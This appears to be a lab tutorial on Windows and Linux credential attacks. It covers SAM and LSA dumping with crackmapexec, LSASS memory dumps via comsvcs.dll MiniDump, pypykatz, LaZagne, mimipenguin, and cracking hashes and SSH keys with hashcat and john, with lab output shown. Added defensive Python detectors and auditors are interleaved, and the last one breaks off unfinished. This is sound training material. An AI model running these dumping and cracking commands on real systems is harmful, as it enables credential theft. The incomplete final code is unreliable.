defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:683b72db605d064397cf503802b51857:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
sam:1002:aad3b435b51404eeaad3b435b51404ee:6f8c3f4d3869a10f3b4f0522f537fd33:::
rocky:1003:aad3b435b51404eeaad3b435b51404ee:184ecdda8cf1dd238d438c4aea4d560d:::
ITlocal:1004:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::

 The third field (aad3b435b51404eeaad3b435b51404ee) is the empty-LM placeholder; the fourth field is the NT hash we crack
Adding NT hashes to a .txt File

ammar@htb[/htb]$ sudo nano hashestocrack.txt

64f12cddaa88057e06a81b54e73b949b
31d6cfe0d16ae931b73c59d7e0c089c0
6f8c3f4d3869a10f3b4f0522f537fd33
184ecdda8cf1dd238d438c4aea4d560d
f7eb9c06fafaa23c4bcf22ba6781c1e2
Running Hashcat against NT Hashes

 Hashcat has many different modes we can use. Selecting a mode is largely dependent on the type of attack and hash type we want to crack; -m 1000 is NTLM (the NT hash)

ammar@htb[/htb]$ sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

<SNIP>

f7eb9c06fafaa23c4bcf22ba6781c1e2:dragon
6f8c3f4d3869a10f3b4f0522f537fd33:iloveme
184ecdda8cf1dd238d438c4aea4d560d:adrian
31d6cfe0d16ae931b73c59d7e0c089c0:

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: dumpedhashes.txt
Time.Started.....: Tue Dec 14 14:16:56 2021 (0 secs)
Time.Estimated...: Tue Dec 14 14:16:56 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14284 H/s (0.63ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 5/5 (100.00%) Digests
Progress.........: 8192/14344385 (0.06%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: newzealand -> whitetiger

Started: Tue Dec 14 14:16:50 2021
Stopped: Tue Dec 14 14:16:58 2021

 The empty plaintext after 31d6cfe0d16ae931b73c59d7e0c089c0 means those accounts have a blank password: it is the NT hash of the empty string
Remote Dumping

 With credentials that have local admin privileges, it is also possible to target LSA secrets over the network. This could allow us to extract credentials from a running service, scheduled task, or application that uses LSA secrets to store passwords
Remote Dumping

ammar@htb[/htb]$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

SMB 10.129.42.198 445 WS01 [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB 10.129.42.198 445 WS01 [+] WS01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB 10.129.42.198 445 WS01 [+] Dumping LSA secrets
SMB 10.129.42.198 445 WS01 WS01\worker:Hello123
SMB 10.129.42.198 445 WS01 dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
SMB 10.129.42.198 445 WS01 NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b
SMB 10.129.42.198 445 WS01 [+] Dumped 3 LSA secrets to /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.cached

 Note the cleartext service account password (worker:Hello123) recovered from the secrets, and the DPAPI machine keys, which can decrypt other secrets protected on this host
Remote Dumping

 We can also dump hashes from the SAM database remotely.


└─$ crackmapexec smb 10.129.254.107 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
SMB 10.129.254.107 445 FRONTDESK01 [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False)
(SMBv1:False)
SMB 10.129.254.107 445 FRONTDESK01 [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB 10.129.254.107 445 FRONTDESK01 [+] Dumping SAM hashes
SMB 10.129.254.107 445 FRONTDESK01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.254.107 445 FRONTDESK01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.254.107 445 FRONTDESK01 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.254.107 445 FRONTDESK01
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB 10.129.254.107 445 FRONTDESK01 bob:1001:aad3b435b51404eeaad3b435b51404ee:3c0e5d303ec84884ad5c3b7876a06ea6:::
SMB 10.129.254.107 445 FRONTDESK01 jason:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB 10.129.254.107 445 FRONTDESK01 ITbackdoor:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB 10.129.254.107 445 FRONTDESK01 frontdesk:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB 10.129.254.107 445 FRONTDESK01 [+] Added 8 SAM hashes to the database
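The SAM records above follow the pwdump layout user:RID:LM hash:NT hash:::. As an added example (not from the page and not part of crackmapexec), here is a small Python parser for that layout together with the checks a defender runs on such a dump: accounts with an empty password, accounts that still store an LM hash, a renamed RID-500 Administrator, and accounts that share one NT hash. The tool prefix, host name and hash values in SAMPLE_DUMP are constructed; the two well-known empty-hash constants are real.

```python
"""Parse pwdump-style SAM lines (user:rid:lm:nt:::) and audit password state.

Added example for this page, not part of the original material or of any tool
it names. SAMPLE_DUMP is constructed; its hash values are placeholders.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Well-known constants (facts, not constructed): the LM field that means "no LM
# hash stored", and the NT hash (MD4 of the empty Unicode string).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

RECORD_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I
)


@dataclass
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text: str) -> list:
    """Extract SAM records; tool prefixes such as 'SMB host 445 NAME ' are ignored."""
    entries = []
    for raw in text.splitlines():
        fields = raw.split()
        if not fields:
            continue
        m = RECORD_RE.match(fields[-1])  # the record is always the last token
        if m:
            entries.append(SamEntry(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def audit(entries: list) -> dict:
    """Return {user: [finding, ...]} for the weaknesses a defender would act on."""
    findings = defaultdict(list)
    by_nt = defaultdict(list)
    for e in entries:
        if e.nt == EMPTY_NT:
            findings[e.user].append("empty password")
        if e.lm != EMPTY_LM:
            findings[e.user].append("LM hash stored (LM hashing still enabled)")
        if e.rid == 500 and e.user.lower() != "administrator":
            findings[e.user].append("built-in Administrator (RID 500) has been renamed")
        by_nt[e.nt].append(e.user)
    # Identical NT hashes mean identical passwords (no salt in NT hashing).
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            for u in users:
                others = ", ".join(o for o in users if o != u)
                findings[u].append(f"same password as {others}")
    return dict(findings)


# Constructed sample in the layout crackmapexec prints; not a real host or dump.
SAMPLE_DUMP = """\
SMB 192.0.2.10 445 WS-EXAMPLE [+] Dumping SAM hashes
SMB 192.0.2.10 445 WS-EXAMPLE Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.0.2.10 445 WS-EXAMPLE Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.0.2.10 445 WS-EXAMPLE alice:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
SMB 192.0.2.10 445 WS-EXAMPLE bob:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
SMB 192.0.2.10 445 WS-EXAMPLE svc_backup:1003:0011223344556677889900aabbccddee:fedcba9876543210fedcba9876543210:::
SMB 192.0.2.10 445 WS-EXAMPLE [+] Added 5 SAM hashes to the database
"""

if __name__ == "__main__":
    for user, notes in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{user}: {'; '.join(notes)}")
```

The shared-hash check works because NT hashes are unsalted: two accounts with the same NT hash have the same password, which is exactly the condition that lets a cracked local administrator password be reused across hosts.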

Attacking LSASS

 LSASS (the Local Security Authority Subsystem Service) is a critical service that plays a central role in credential management and the authentication processes in all Windows operating systems.

 Upon initial logon, LSASS will:
  Cache credentials locally in memory
  Create access tokens
  Enforce security policies
  Write to the Windows security log

Dumping LSASS Process Memory

 As with the SAM database, it is wise to first make a copy of the contents of LSASS process memory by generating a memory dump. Creating a dump file lets us extract credentials offline on our attack host. Working offline gives us more flexibility in the speed of the attack and requires less time spent on the target system. There are countless methods we can use to create a memory dump.

Task Manager
 Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file
 A file called lsass.DMP is created and saved in:

C:\Users\loggedonusersdirectory\AppData\Local\Temp

 This is the file we will transfer to our attack host.

Rundll32.exe & Comsvcs.dll Method

 The Task Manager method depends on having a GUI-based interactive session with the target. An alternative is to dump LSASS process memory with the command-line utility rundll32.exe. This is faster than the Task Manager method and more flexible, because we may only have a command-line shell on a Windows host. It is important to note that modern anti-virus tools recognize this method as malicious activity.
 Before issuing the command to create the dump file, we must determine what process ID (PID) is assigned to lsass.exe. This can be done from cmd or PowerShell:

Finding LSASS PID in cmd

Finding LSASS PID in PowerShell
PS C:\Windows\system32> Get-Process lsass

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1260      21     4948      15396       2.56    672   0 lsass

 Once we have the PID assigned to the LSASS process, we can create the dump file.

 With an elevated PowerShell session, we can issue the following command to create the dump file:
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

 With this command, we are running rundll32.exe to call the exported MiniDump function of comsvcs.dll, which in turn calls MiniDumpWriteDump to write the memory of the LSASS process (PID 672) to the specified file (C:\lsass.dmp).
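From the defender's side, both dump methods above leave a trace in process telemetry: the rundll32 command line names comsvcs.dll and MiniDump, and any dump, the Task Manager one included, has to open lsass.exe with PROCESS_VM_READ and PROCESS_QUERY_INFORMATION. The following added example (not from the page) runs those two checks over constructed events shaped like Sysmon Event ID 1 (ProcessCreate) and Event ID 10 (ProcessAccess). The Sysmon field names are real; the event values and the ALLOWED_LSASS_READERS allowlist are assumptions for the example.

```python
"""Flag LSASS memory-dump activity in process telemetry.

Added example, not from the original page. The events are constructed dicts
shaped like Sysmon Event ID 1 (ProcessCreate) and Event ID 10 (ProcessAccess)
records: the field names are Sysmon's, every value is made up.
"""

# Access rights a dump needs on the target process (Win32 constants).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Processes allowed to read LSASS memory. This allowlist is an assumption for the
# example; a real deployment tunes it to its own AV/EDR and OS components.
ALLOWED_LSASS_READERS = {"msmpeng.exe", "csrss.exe", "wininit.exe", "wmiprvse.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return one alert string per suspicious event, in input order."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1:
            # Rule 1: the rundll32 / comsvcs.dll MiniDump command line shown on the page.
            image = _basename(ev.get("Image", ""))
            cmd = ev.get("CommandLine", "")
            if image == "rundll32.exe" and "comsvcs" in cmd.lower() and "minidump" in cmd.lower():
                alerts.append(f"LSASS dump via rundll32/comsvcs.dll MiniDump: {cmd}")
        elif eid == 10:
            # Rule 2: a process outside the allowlist opening lsass.exe with the
            # rights a dump needs. This catches the Task Manager method as well.
            target = _basename(ev.get("TargetImage", ""))
            source = _basename(ev.get("SourceImage", ""))
            granted = int(ev.get("GrantedAccess", "0x0"), 16)
            has_dump_rights = bool(granted & PROCESS_VM_READ) and bool(granted & PROCESS_QUERY_INFORMATION)
            if target == "lsass.exe" and has_dump_rights and source not in ALLOWED_LSASS_READERS:
                alerts.append(f"{source} opened lsass.exe with GrantedAccess 0x{granted:x}")
    return alerts


# Constructed telemetry: a benign process start, the page's dump command, a Task
# Manager dump, an allowlisted AV engine, and a handle without read rights.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Rule 2 is the more robust of the two, since it keys on what every dump must do rather than on one command line; the cost is the allowlist, which has to be maintained per environment.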
Using Pypykatz to Extract Credentials

 Once we have the dump file on our attack host, we can use a powerful tool called pypykatz to attempt to extract credentials from the .dmp file. Pypykatz is an implementation of Mimikatz written entirely in Python, which allows us to run it on Linux-based attack hosts.


 Recall that LSASS stores the credentials of active logon sessions on Windows systems. When we dumped LSASS process memory into the file, we essentially took a "snapshot" of what was in memory at that point in time. If there were any active logon sessions, the credentials used to establish them will be present.


Running Pypykatz
ammar@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp

INFO:root:Parsing file /home/peter/Documents/lsass.dmp


FILE: ======== /home/peter/Documents/lsass.dmp =======
== LogonSession ==
authentication_id 1354633 (14ab89)
session_id 2
username bob
domainname DESKTOP-33E7O54
logon_server WIN-6T0C3J2V6HP
logon_time 2021-12-14T18:14:25.514306+00:00
sid S-1-5-21-4019466498-1700476312-3544718034-1001
luid 1354633
== MSV ==
Username: bob
Domain: DESKTOP-33E7O54
LM: NA
NT: 64f12cddaa88057e06a81b54e73b949b
SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
DPAPI: NA
== WDIGEST [14ab89]==


 The command tells pypykatz to parse the secrets hidden in the LSASS process memory dump. We use lsa in the command because LSASS is a subsystem of the Local Security Authority; we then specify the data source as a minidump file, followed by the path to the dump file (/home/peter/Documents/lsass.dmp) stored on our attack host. Pypykatz parses the dump file and outputs the findings.


MSV
 MSV is an authentication package in Windows that LSA calls on to validate logon attempts against the SAM database. Pypykatz extracted the SID, Username, Domain, and even the NT & SHA1 password hashes associated with the bob user account's logon session stored in LSASS process memory:

sid S-1-5-21-4019466498-1700476312-3544718034-1001
luid 1354633
== MSV ==
Username: bob
Domain: DESKTOP-33E7O54
LM: NA
NT: 64f12cddaa88057e06a81b54e73b949b
SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
DPAPI: NA


WDIGEST
 WDIGEST is an older authentication protocol enabled by default in Windows XP - Windows 8 and Windows Server 2003 - Windows Server 2012. LSASS caches credentials used by WDIGEST in clear-text. This means that if we find ourselves targeting a Windows system with WDIGEST enabled, we will most likely see a password in clear-text. Modern Windows operating systems have WDIGEST disabled by default.

== WDIGEST [14ab89]==
username bob
domainname DESKTOP-33E7O54
password None
password (hex)

Kerberos
 Kerberos is a network authentication protocol used by Active Directory in Windows Domain environments. Domain user accounts are granted tickets upon authentication with Active Directory. This ticket allows the user to access shared resources on the network that they have been granted access to without needing to type their credentials each time. LSASS caches passwords, ekeys, tickets, and pins associated with Kerberos. It is possible to extract these from LSASS process memory and use them to access other systems joined to the same domain.

== Kerberos ==
Username: bob
Domain: DESKTOP-33E7

DPAPI
 The Data Protection Application Programming Interface, or DPAPI, is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications.

== DPAPI [14ab89]==
luid 1354633
key_guid 3e1d1091-b792-45df-ab8e-c66af044d69b
masterkey e8bc2faf77e7bd1891c0e49f0dea9d447a491107ef5b25b9929071f68db5b0d55bf05df5a474d9bd94d98be4b4ddb690e6d8307a86be6f81be0d554f195fba92
sha1_masterkey 52e758b6120389898f7fae553ac8172b43221605


 Here are just a few examples of applications that use DPAPI and what they use it for:

Application                Use of DPAPI
Internet Explorer          Password form auto-completion data (username and password for saved sites).
Google Chrome              Password form auto-completion data (username and password for saved sites).
Outlook                    Passwords for email accounts.
Remote Desktop Connection  Saved credentials for connections to remote machines.
Credential Manager         Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more.

 Mimikatz and Pypykatz can extract the DPAPI masterkey for the logged-on user whose data is present in LSASS process memory. This masterkey can then be used to decrypt the secrets associated with each of the applications using DPAPI, resulting in the capture of credentials for various accounts.

Credential Hunting in Windows

 Credential Hunting is the process of performing detailed searches across the file system and through various applications to discover credentials.
 A user may have documented their passwords somewhere on the system. There may even be default credentials that could be found in various files. It would be wise to base our search for credentials on what we know about how the target system is being used.

Key Terms to Search

Passwords, Passphrases, Keys, Username, User account, Creds, Users, Passkeys, configuration, dbcredential, dbpassword, pwd, Login, Credentials

 We can also take advantage of third-party tools like Lazagne to quickly discover credentials that web browsers or other installed applications may store insecurely. It is beneficial to keep a standalone copy of Lazagne on our attack host so we can quickly transfer it over to the target.

C:\Users\bob\Desktop> start lazagne.exe all

 This will execute Lazagne and run all included modules. We can include the option -vv to study what it is doing in the background. Once we hit enter, it will open another prompt and display the results.

Using findstr

 We can also use findstr to search for patterns across many types of files. Keeping common key terms in mind, we can use variations of this command to discover credentials on a Windows target:
C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Credential Hunting in Linux

 There are several sources that can provide us with credentials, which we put in four categories:

Files: Configs, Databases, Notes, Scripts, Source codes, Cronjobs, SSH Keys
History: Logs, Command-line History
Memory: Cache, In-memory Processing
Key-Rings: Browser stored credentials
Files

 One core principle of Linux is that everything is a file. Therefore, it is crucial to keep this concept in mind and to search, find and filter the appropriate files according to our requirements. We should look for, find, and inspect several categories of files one by one.
 Configuration files are the core of the functionality of services on Linux distributions. Often they even contain credentials that we will be able to read. Usually, configuration files are marked with one of three file extensions (.config, .conf, .cnf).
for l in $(echo ".conf .config .cnf"); do echo -e "\nFile extension: " $l; find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"; done

1. Loop start: for l in $(echo ".conf .config .cnf"); do
   • Iterates over the list of file extensions (.conf, .config, .cnf); the list is echoed and then fed to the for loop.
2. Inside the loop:
   • Print file extension: echo -e "\nFile extension: " $l prints the extension currently being processed ($l); the -e flag makes echo interpret escape sequences such as \n.
   • Find files: find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"
     • find / -name "*$l" 2>/dev/null finds all files on the system (/) whose name ends with the extension $l. The pattern is quoted so that the shell does not expand the * against files in the current directory before find sees it; 2>/dev/null sends standard error to /dev/null, suppressing messages such as permission denied.
     • grep -v "lib\|fonts\|share\|core" drops every line that contains "lib", "fonts", "share" or "core"; the -v flag inverts the match.
3. Loop end: done

for i in $(find / -name "*.cnf" 2>/dev/null | grep -v "doc\|lib"); do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#"; done

 Another option is to run the search directly on each file found with the specified extension and output the matching lines. In this example, we search for three words (user, password, pass) in each file with the extension .cnf and drop lines that contain a # character.
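The two shell loops above boil down to one procedure: find files by extension, skip noisy paths, grep for credential keywords, and drop comments. Here is that procedure as a Python scanner, an added example rather than code from the page, that also prunes excluded directories before descending and reports line numbers. It builds and scans a constructed sample tree in a temporary directory, so every file name and value in it is made up; the keyword list extends the page's user|password|pass with a few more common spellings.

```python
"""Credential keyword scan over configuration files, the Python counterpart of
the shell loops above. Added example, not from the original page; the sample
tree it builds is constructed and every path and value in it is made up.
"""
import os
import re
import tempfile

CONFIG_EXTS = (".conf", ".config", ".cnf")
# Same path filter as grep -v "lib\|fonts\|share\|core" in the shell loop.
EXCLUDED_PATH_PARTS = ("lib", "fonts", "share", "core")
# The shell loop greps for user|password|pass; a few common spellings are added.
KEYWORD_RE = re.compile(
    r"\b(user(name)?|pass(word|wd|phrase)?|pwd|secret|token|api[_-]?key|credentials?)\b", re.I
)
COMMENT_PREFIXES = ("#", ";", "//")


def find_config_files(root: str):
    """Yield config files under root whose relative path avoids the excluded parts."""
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune excluded directories so the walk never descends into them.
        dirnames[:] = [d for d in dirnames if not any(p in d for p in EXCLUDED_PATH_PARTS)]
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.endswith(CONFIG_EXTS) and not any(p in rel for p in EXCLUDED_PATH_PARTS):
                yield path


def scan_file(path: str) -> list:
    """Return (line_number, text) for keyword hits, ignoring comment lines."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            text = line.strip()
            if not text or text.startswith(COMMENT_PREFIXES):
                continue
            if KEYWORD_RE.search(text):
                hits.append((lineno, text))
    return hits


def scan_tree(root: str) -> dict:
    """Map each config file (path relative to root) with hits to its list of hits."""
    results = {}
    for path in find_config_files(root):
        hits = scan_file(path)
        if hits:
            results[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return results


def build_sample_tree() -> str:
    """Create a constructed directory tree that exercises every filter once."""
    root = tempfile.mkdtemp(prefix="confscan-")
    files = {
        "etc/mysql/my.cnf": "[client]\n# password = oldvalue\nuser = dbadmin\npassword = Winter2024!\n",
        "usr/share/doc/pkg/sample.conf": "password = ignored-by-path-filter\n",
        "opt/app/app.config": "listen = 0.0.0.0:8080\n; auth_token = commented out\n",
        "home/dev/notes.txt": "db password is Winter2024!\n",  # wrong extension, not scanned
        "etc/ssl/openssl.cnf": "[ca]\ndir = /etc/ssl\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel, hits in scan_tree(sample_root).items():
        for lineno, text in hits:
            print(f"{rel}:{lineno}: {text}")
```

Two differences from the shell version are deliberate: comments are recognised by their leading marker only, so a value such as password = abc#1 is not silently dropped the way grep -v "\#" drops it, and the output of a scan like this is itself sensitive, so it belongs in the engagement's evidence store rather than a shared terminal log.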

 A simple recursive, case-insensitive keyword search works as well:
grep -ir telnet

History

 In the history of the commands entered on Linux distributions that use


Bash as a standard shell, we find the associated files in .bash_history.
Nevertheless, other files like .bashrc or .bash_profile can contain
important information cry0l1t3@unixclient:~$ tail -n5 /home/*/.bash*

==> /home/cry0l1t3/.bash_history <==


vim ~/testing.txt
vim ~/testing.txt
chmod 755 /tmp/api.py
su
/tmp/api.py cry0l1t3 6mX4UP1eWH3HXK

==> /home/cry0l1t3/.bashrc <==


. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi

Logs

 An essential concept of Linux systems is log files, which are stored as text files. Many programs, especially all services and the system itself, write such files. In them, we find system errors, detect problems with services, or follow what the system is doing in the background. Log files can be divided into four categories:

Application Logs, Event Logs, Service Logs, System Logs


Log File                         Description
/var/log/messages                Generic system activity logs.
/var/log/syslog                  Generic system activity logs.
/var/log/auth.log (Debian)       All authentication related logs.
/var/log/secure (RedHat/CentOS)  All authentication related logs.
/var/log/boot.log                Booting information.
/var/log/dmesg                   Hardware and drivers related information and logs.
/var/log/kern.log                Kernel related warnings, errors and logs.
/var/log/faillog                 Failed login attempts.
/var/log/cron                    Information related to cron jobs.
/var/log/mail.log                All mail server related logs.
/var/log/httpd                   All Apache related logs.
/var/log/mysqld.log              All MySQL server related logs.

Memory and Cache

 Many applications and processes work with credentials needed for authentication and store them either in memory or in files so that they can be reused. For example, it may be the system-required credentials for the logged-in users. Another example is the credentials stored in browsers, which can also be read. To retrieve this type of information from Linux distributions, there is a tool called mimipenguin that makes the whole process easier. However, this tool requires administrator/root permissions.

cry0l1t3@unixclient:~$ sudo python3 mimipenguin.py
[sudo] password for cry0l1t3:

[SYSTEM - GNOME] cry0l1t3:WLpAEXFa0SbqOHY

cry0l1t3@unixclient:~$ sudo bash mimipenguin.sh
[sudo] password for cry0l1t3:

MimiPenguin Results:
[SYSTEM - GNOME] cry0l1t3:WLpAEXFa0SbqOHY


 An even more powerful tool we can use, mentioned earlier in the Credential Hunting in Windows section, is LaZagne:

cry0l1t3@unixclient:~$ sudo python2.7 laZagne.py all

|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                           ! BANG BANG !                            |
|                                                                    |
|====================================================================|

------------------- Shadow passwords -----------------

[+] Hash found !!!
Login: systemd-coredump
Hash: !!:18858::::::

[+] Hash found !!!
Login: sambauser
Hash: $6$wgK4tGq7Jepa.V0g$QkxvseL.xkC3jo682xhSGoXXOGcBwPLc2CrAPugD6PYXWQlBkiwwFs7x/fhI.8negiUSPqaWyv7wC8uwsWPrx1:18862:0:99999:7:::

[+] Password found !!!
Login: cry0l1t3
Password: WLpAEXFa0SbqOHY

Cracking File Passwords

Cracking with John

 John The Ripper ships many scripts that generate hashes from files, which we can then use for cracking. We can find these scripts on our system using the following command:

ammar@htb[/htb]$ locate *2john*

/usr/bin/bitlocker2john
/usr/bin/dmg2john
/usr/bin/gpg2john
/usr/bin/hccap2john
/usr/bin/keepass2john
/usr/bin/putty2john
/usr/bin/racf2john
/usr/bin/rar2john
/usr/bin/zip2john
/usr/share/john/1password2john.py
/usr/share/john/7z2john.pl
/usr/share/john/DPAPImk2john.py
/usr/share/john/adxcsouf2john.py
/usr/share/john/aem2john.py

Cracking SSH Keys

ammar@htb[/htb]$ ssh2john.py SSH.private > ssh.hash
ammar@htb[/htb]$ cat ssh.hash

ssh.private:$sshng$0$8$1C258238FD2D6EB0$2352$f7b...SNIP...

ammar@htb[/htb]$ john --wordlist=rockyou.txt ssh.hash

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
1234 (SSH.private)
1g 0:00:00:00 DONE (2022-02-08 03:03) 16.66g/s 1747Kp/s 1747Kc/s 1747KC/s Knightsing..Babying
Session completed
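The john output above reports Cost 1 (KDF/cipher) as 0, i.e. the legacy PEM format whose encryption key is derived from the passphrase with a single MD5 pass, which is why a passphrase like 1234 falls in well under a second. The same information can be read from a key file's headers without cracking anything, which is how a defender audits a set of keys. The following added example (not from the page and not part of John the Ripper) classifies legacy PEM and openssh-key-v1 files by encryption, KDF and bcrypt round count; the sample keys it builds carry real headers around dummy key bytes, and MIN_BCRYPT_ROUNDS is an assumed policy floor equal to ssh-keygen's default.

```python
"""Audit SSH private keys for how well their passphrase protects them.

Added example, not part of the page or of John the Ripper. It reads only the key
headers: the legacy PEM format (Proc-Type / DEK-Info lines) and the OpenSSH
openssh-key-v1 container, whose cipher, KDF and round count precede any key
material. The sample keys are constructed: real headers, dummy key bytes.
"""
import base64
import struct

OPENSSH_BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
OPENSSH_END = "-----END OPENSSH PRIVATE KEY-----"
AUTH_MAGIC = b"openssh-key-v1\x00"
MIN_BCRYPT_ROUNDS = 16  # assumption: ssh-keygen's default (-a 16) used as the floor


def _sstring(data: bytes) -> bytes:
    """SSH wire string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def classify_private_key(pem: str) -> dict:
    """Return format, encryption and KDF details plus a verdict for one key file."""
    lines = [l.strip() for l in pem.strip().splitlines()]
    if lines[0] == OPENSSH_BEGIN:
        raw = base64.b64decode("".join(l for l in lines[1:] if not l.startswith("-----")))
        if not raw.startswith(AUTH_MAGIC):
            raise ValueError("not an openssh-key-v1 container")
        off = len(AUTH_MAGIC)
        cipher, off = _read_string(raw, off)
        kdf, off = _read_string(raw, off)
        kdfopts, off = _read_string(raw, off)
        rounds = None
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        info = {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
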